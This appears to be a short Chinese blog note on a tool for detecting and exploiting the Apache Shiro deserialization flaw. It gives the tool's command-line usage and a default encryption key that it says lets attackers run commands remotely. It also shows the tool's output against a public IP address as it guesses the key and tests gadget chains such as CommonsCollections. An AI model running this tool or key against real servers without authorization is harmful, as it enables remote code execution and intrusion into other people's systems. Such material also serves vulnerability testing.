检测工具
检测命令
检测是否使用shiro:java -cp shiro_tool.jar shiro.Check http://url
java -jar shiro_tool.jar https://xx.xx.xx.xx nocheck --> skip check target is shiro or not. key= --> set a shiro key. req= --> request body file 抓包保存到文件里,这里写文件名 keys= --> keys file 自定义key的文件,key按行分割,即每行写一个
(存在默认密钥:kPH+bIxk5D2deZiIxcaaaA==攻击者可利用漏洞远程执行任意命令入侵服务器) java -jar shiro_tool.jar https://xx.xx.xx.xx [-] target: http://47.110.35.164:8080 [-] target is use shiro [-] start guess shiro key... [-] use shiro key: kPH+bIxk5D2deZiIxcaaaA== [-] check CommonsBeanutils1 [-] check CommonsCollections1 [-] check CommonsCollections2 [-] check CommonsCollections3 [-] check CommonsCollections4 [-] check CommonsCollections5 [-] check CommonsCollections6 [-] check CommonsCollections7 [-] check CommonsCollections8 [-] check CommonsCollections9 [-] check CommonsCollections10 [-] check Groovy1 [-] check JSON1
Apache Shiro 漏洞检测
点赞
收藏